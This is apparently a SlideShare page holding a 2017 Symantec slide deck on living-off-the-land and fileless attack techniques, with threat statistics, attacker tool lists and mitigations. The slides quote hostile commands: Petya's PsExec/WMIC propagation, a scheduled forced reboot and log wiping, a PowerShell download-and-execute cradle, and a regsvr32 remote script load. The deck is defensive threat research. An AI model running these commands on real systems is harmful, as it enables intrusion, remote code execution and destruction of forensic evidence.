Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

Living off the land and fileless attack techniques

2.563 Aufrufe

Veröffentlicht am

There is increased discussion around threats that adopt so-called “living off the land” tactics. Attackers are increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode directly in memory. Creating fewer new files on the hard disk, or being completely fileless, means less chance of being detected by traditional security tools and therefore minimizes the risk of an attack being blocked. Using simple and clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.

Further reading:
Attackers are increasingly living off the land (https://www.symantec.com/connect/blogs/attackers-are-increasingly-living-land)

Living off the land and fileless attack techniques (https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf)

Veröffentlicht in: Technologie
  • Very well researched and comprehensive information condensed in a relatively few slides
    Sind Sie sicher, dass Sie …  Ja  Nein
    Ihre Nachricht erscheint hier

Living off the land and fileless attack techniques

  1. 1. Presenter Date Living off the land tactics, fileless attacks & dual-use tools
  2. 2. 2Copyright © 2017 Symantec Corporation Definition: Living off the land Only pre-installed software is used by the attacker and no additional binary executables are installed onto the system Living off the land 2
  3. 3. 3Copyright © 2017 Symantec Corporation Attackers are using what’s already available to attack you o Less new files on disk → more difficult to detect attack o Use off-the-shelf tools & cloud services → difficult to determine intent & source o These tools are ubiquitous → hide in plain sight o Finding exploitable zero-day vulnerabilities is getting more difficult → use simple and proven methods such as email & social engineering Living off the land 3
  4. 4. 4Copyright © 2017 Symantec Corporation Multiple fileless methods possible - not all are truly fileless: «Fileless» attacks e.g. remote code exploits such as EternalBlue and CodeRedMEMORY ONLY ATTACKS FILELESS LOADPOINT NON-PE FILES DUAL-USE TOOLS Documents with macros, PDFs with JavaScript and scripts (VBS, JavaScript, PowerShell,…) Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver Using benign tools, such as PsExec, to do malicious things
  5. 5. 5Copyright © 2017 Symantec Corporation Living off the land attack chain Exploit in memory e.g. SMB EternalBlue Email with Non-PE file e.g. document macro Weak or stolen credentials e.g. RDP password guess INCURSION Remote script dropper e.g. LNK with PowerShell from cloud 1. Memory only malware e.g. SQL Slammer Non-persistent Persistent PERSISTENCE Fileless persistence loadpoint e.g. JScript in registry Regular non-fileless method 2. PAYLOAD Regular non-fileless payload Non-PE file payload e.g. PowerShell script Memory only payload e.g. Mirai DDoS Dual-use tools e.g. netsh or PsExec.exe 3.
  6. 6. 6Copyright © 2017 Symantec Corporation Section Memory only attacks 1
  7. 7. 7Copyright © 2017 Symantec Corporation Run malicious code only in memory, does not write any files to disk o Mainly remote code execution (RCE) exploits, like EternalBlue o CodeRed in 2001 was the first widespread outbreak of this type o A computer restart will clean/disinfect o PowerShell can be used to load and execute payload in memory Attackers do not always need persistence: o Mirai bot – re-infects device through a restart if it gets cleaned o Targeted attack groups – core systems do not get restarted often Memory only attacks
  8. 8. 8Copyright © 2017 Symantec Corporation Section Dual-use tools 2
  9. 9. 9Copyright © 2017 Symantec Corporation System tools and clean applications used for nefarious purposes Some tools are pre-installed, some are downloaded by the attacker Dual-use tools Type of internal activity Purpose Dual-use tools Internal network reconnaissance Enumerate information about a target environment net user, systeminfo, whoami, hostname, quser, ipconfig Credential harvesting Obtain legitimate user credentials to gain access to target systems for malicious purposes Mimikatz, WCE, pwdump Lateral movement Gain deeper access into target network PsExec, PowerShell, WMI, RDP Data exfiltration Send data back to attackers FTP, RAR, ZIP, iExplorer, PuTTY, PowerShell, rdpclip Fallback backdoor Enables a backdoor that can be used, should the main backdoor be removed net user, RDP, Telnet server
  10. 10. 10Copyright © 2017 Symantec Corporation o Many attack groups use common system tools during their attacks Information gathering • systeminfo • net view • net view /domain • tasklist /v • gpresult /z • arp -a • net share • net use • net user administrator • net user /domain • net user administrator /domain • tasklist /fi WATERBUG/TURLA • hostname • whoami • ver • ipconfig -all • ping www.google.com • query user • net user • net view • net view /domain • tasklist /svc • netstat -ano | find TCP • msdtc [IP] [port] APPLEWORM/LAZARUS • net user • ipconfig /all • net start • systeminfo • gpresult BILLBUG
  11. 11. 11Copyright © 2017 Symantec Corporation Group name Reconnaissance Credential harvesting Lateral movement Custom built tools Tick whoami, procdump, VBS WCE, Mimikatz, gsecdump PsExec Yes Waterbug systeminfo, net, tasklist, gpresult,… WCE, pwdump Open shares Yes Suckfly tcpscan, smbscan WCE, gsecdump, credentialdumper - Yes Fritillary PowerShell, sdelete Mimikatz, PowerShell PsExec Yes Destroyer Disk usage, event log viewer kerberos manipulator PsExec, curl, VNC Yes Chafer network scanner, SMB bruteforcer WCE, Mimikatz, gsecdump,… PsExec Yes Greenbug Broutlook WCE, gsecdump, browdump, … TeamViewer, PuTTY Yes Buckeye os info, user info, smb enumerator,… pwdump, Lazagne, chromedump,… Open shares Yes Billbug ver, net, gpresult, systeminfo, ipconfig, … - custom backdoor Yes Appleworm net, netsh, query, telnet, find, … dumping SAM RDP bruteforcer, rdclip Yes Targeted attacks & dual-use tools
  12. 12. 12Copyright © 2017 Symantec Corporation o 10 out of 10 of groups analyzed used system tools in combination with custom tools during their attacks o Application whitelisting often does not protect against such attacks Examples: o Petya used PsExec, WMI, and LSAdump for lateral movement o Calcium/Fin7 group used PowerShell payloads in attacks in 2017 o Attack against DNC in 2016 used PowerShell for lateral movement and discovery and used a WMI fileless persistence method Targeted attack groups
  13. 13. 13Copyright © 2017 Symantec Corporation o Mimikatz and PsExec are popular for lateral movement, e.g. Petya Dual-use tools Global usage
  14. 14. 14Copyright © 2017 Symantec Corporation Example: Ransom.Petya
  15. 15. 15Copyright © 2017 Symantec Corporation o Threat is a DLL executed by rundll32.exe o Uses recompiled version of LSADump Mimikatz to get passwords o Uses PsExec to propagate o [server_name]admin$perfc.dat o psexec rundll32.exe c:windowsperfc.dat #1 <rand> o Uses WMI to propagate if PsExec fails o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create “%System%rundll32.exe “%Windows%perfc.dat" #1 60” o Scheduled task to restart into the malicious MBR payload o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%shutdown14:42.exe /r /f" /ST o Deletes log files to hide traces o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C: Petya uses dual-use tools
  16. 16. 16Copyright © 2017 Symantec Corporation The Odinaff group used multiple dual-use tools in their attack o Mimikatz: An open source password recovery tool o PsExec: A process execution tool from Microsoft o Netscan: A network scanning tool o Ammyy Admin: A remote access tool o Gussdoor: A custom remote backdoor (Backdoor.Gussdoor) o RunAs: A tool for running processes as another user o PowerShell: Various commands used Example: Odinaff group
  17. 17. 17Copyright © 2017 Symantec Corporation o On average 2% of malware in our sandbox misused WMI WMI usage in malware
  18. 18. 18Copyright © 2017 Symantec Corporation Usage of dual-use tools - January 2017 Tool Usage count sc.exe 2.7190% vnc 2.1176% net.exe 1.2733% powershell.exe 1.0263% ipconfig.exe 0.8227% netsh.exe 0.7526% teamviewer.exe 0.6224% tasklist.exe 0.4963% rdpclip.exe 0.3226% rar.exe 0.3139% Tool Usage count wmic.exe 0.3027% find.exe 0.2767% curl.exe 0.2027% netstat.exe 0.1938% systeminfo.exe 0.1641% wget.exe 0.1208% nc.exe 0.1174% gpresult.exe 0.1147% whoami.exe 0.1109% ammyy.exe 0.1061% o System tools are popular with administrators and cyber criminals o Remote administration tools are often misused by attackers
  19. 19. 19Copyright © 2017 Symantec Corporation o PowerShell is still gaining popularity with attackers Usage of dual-use tools
  20. 20. 20Copyright © 2017 Symantec Corporation Section Non-PE files PE = Portable Executables 3
  21. 21. 21Copyright © 2017 Symantec Corporation Malicious macro with social engineering Malcious documents still popular 21 Embedded binary can be double clicked
  22. 22. 22Copyright © 2017 Symantec Corporation o Scripts are very popular, especially PowerShell o Many script toolkits available o Scripts are easy to obfuscate and difficult to detect with signatures o Scripts are flexible and can be quickly adapted if needed Non-PE files powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true}; iex ((New-Object System.Net.WebClient).DownloadString(‘[REMOVED]’)) Example PowerShell downloader
  23. 23. 23Copyright © 2017 Symantec Corporation Common malware use cases for PowerShell 23 PowerShell script used to download payload to disk or memory Often used in email attachments such as WSF or document macros DOWNLOADER PowerShell script used as persistent loadpoint on Windows Often stored completely in registry (fileless) e.g. Kotver or within WMI LOADPOINT PowerShell script remoting to execute on remote computer (Invoke- Command) Download and execute Mimikatz, etc. in order to steal credentials LATERAL MOVEMENT
  24. 24. 24Copyright © 2017 Symantec Corporation Email script downloaders 24 Detections by month for JavaScript and macro downloaders
  25. 25. 25Copyright © 2017 Symantec Corporation o Malicious attachments with HTML code gained popularity in 2017 Attachment file extensions
  26. 26. 26Copyright © 2017 Symantec Corporation Prevalence of PowerShell o 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious 26 Volume of PowerShell samples from customers in our sandbox in 2016 1. 9.4% W97M.Downloader 2. 4.5% Trojan.Kotver 3. 4.0% JS.Downloader TOP 3 THREATS THAT USE POWERSHELL
  27. 27. 27Copyright © 2017 Symantec Corporation Section Fileless loadpoints 4
  28. 28. 28Copyright © 2017 Symantec Corporation There are many ways to have a loadpoint without adding a new file: o Windows registry o Windows Management Instrumentation (WMI) o Group Policies Objects (GPO) o Scheduled task o … Fileless loadpoints
  29. 29. 29Copyright © 2017 Symantec Corporation Common: Windows registry run key that points to the malware binary file New trick: Windows registry run key contains a script that will get executed o This script can load more payloads from other registry keys and run them o As the script is not in a file on disk it might be missed by traditional security tools Script embedded in the registry
  30. 30. 30Copyright © 2017 Symantec Corporation o Multiple stages in registry o Uses JavaScript and PowerShell o Loads DLL directly into memory o Decrypted directly in memory o Uses non printable ASCII character to protect own registry key Example: Poweliks
  31. 31. 31Copyright © 2017 Symantec Corporation o Registry run key can also point to a remote SCT file o Regsvr32 will download and execute the embedded JScript Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll Example: Downloder.Dromedan (40,000 detections / day) o Embedded JScript uses WMI to execute a PowerShell payload o Script stores encoded DLL in the registry for later Remote SCT load Malicious.sct file
  32. 32. 32Copyright © 2017 Symantec Corporation Similar trigger methods exist for: o Windows Management Instrumentation (WMI) o Group Policies Objects (GPO) o Scheduled task Fileless loadpoints WMI PowerShell backdoor
  33. 33. 33Copyright © 2017 Symantec Corporation Without additional files, but writing to existing files o File infector Infect any file that gets restarted with the PC o Browser files Infect the core browser files or extensions o PowerShell profile Add malicious script to profile file o Trigger on shutdown Remove itself once started and write registry run key when system shutdown is called o BITSadmin Add a malicious update server as backdoor Not truly fileless loadpoints
  34. 34. 34Copyright © 2017 Symantec Corporation If no file is written to disk → security measures might not work Lack of indicators of compromise (IoCs) for sharing Common malware does not always use a loadpoint anymore Symantec has various detection features in place for such threats Detection challenges
  35. 35. 35Copyright © 2017 Symantec Corporation o Monitor the use of dual-use tools inside your network o Block remote execution through PsExec and WMI (if applicable) o Enable better logging and process the information (if applicable) o Enable advanced account security features, like 2FA and login notification (if applicable) o Protect against password and credential theft, for example, with behavior based security solutions Mitigation & best practices
  36. 36. 36Copyright © 2017 Symantec Corporation • Deepsight IoC feeds • MATI custom reports • Threat Intelligence • Managed Security Services (MSS) • Incident Response (IR) on site • Data Loss Prevention (DLP) • … • Proxy SG secure web gateway • Security Analytics • Web Security Service • Data Center Security (DCS) • Control Compliance Suite (CCS) … Protection solutions Symantec Endpoint Protection (SEP) 14 Reputation, machine learning, behavior detection, emulation, exploit mitigation, IPS, … • Public awareness/white papers • Law enforcement collaboration • Infrastructure takedowns • … • Email Security.cloud • MAA Sandbox • Advanced Threat Protection (ATP) • … Attacker Organization Users
  37. 37. 37Copyright © 2017 Symantec Corporation Advanced Antivirus Engine o Symantec uses an array of detection engines including an advanced signature-based antivirus engine with heuristics, just-in-time (JIT) memory- scanning, emulator and advanced machine-learning engines. This allows for the detection of directly in-memory executed fileless threats. SONAR Behavior Engine o SONAR is Symantec’s real-time behavior-based protection that blocks potentially malicious applications from running on the computer. It detects malware without requiring any specific detection signatures. SONAR uses heuristics, reputation data, and behavioral policies to detect emerging and unknown threats. Email Protection o Email-filtering services such as Symantec Email Security.cloud can block malicious emails before they reach users. Symantec Messaging Gateway’s Disarm Technology can also protect by removing malicious content before they even reach the user. Malware Analysis Sandbox o Sandboxes such as Blue Coat Malware Analysis have the capability to analyze and block malicious scripts including PowerShell scripts. The technology can overcome multiple layers of obfuscation to detect deeply hidden suspicious behavior. Network Protection o Symantec’s Secure Web Gateway and IPS and firewall on the endpoint can monitor and block malicious traffic entering or leaving a system and can help minimizing impacts of attacks. Suspicious content can be automatically analyzed on sandboxes. System Hardening o Symantec’s system hardening solution, Symantec Data Center Security, can secure physical and virtual servers, and monitor the compliance posture of server systems for on-premise, public, and private cloud data centers. By defining allowed behavior, Symantec Data Center Security can limit the use of scripts and any of their actions. Visibility and Services o Symantec’s Managed Security Services can help with threat intelligtence, with proactive threat hunting, as well as incident response handling. Symantec: Robust protection against fileless threats 37
  38. 38. 38Copyright © 2017 Symantec Corporation o Nearly all targeted attack groups use system tools in their attacks o Sandboxes are often not able to handle fileless attacks properly o Fileless attacks are difficult to detect as they leave less traces o Application whitelisting will not protect against all living off the land tactics o Script attacks, especially PowerShell, are increasing Conclusion
  39. 39. 39Copyright © 2017 Symantec Corporation o BLOG: Attackers are increasingly living off the land o WHITEPAPER: Living off the land and fileless attack techniques Further reading
  40. 40. 40Copyright © 2017 Symantec Corporation 40Copyright © 2017 Symantec Corporation Thank you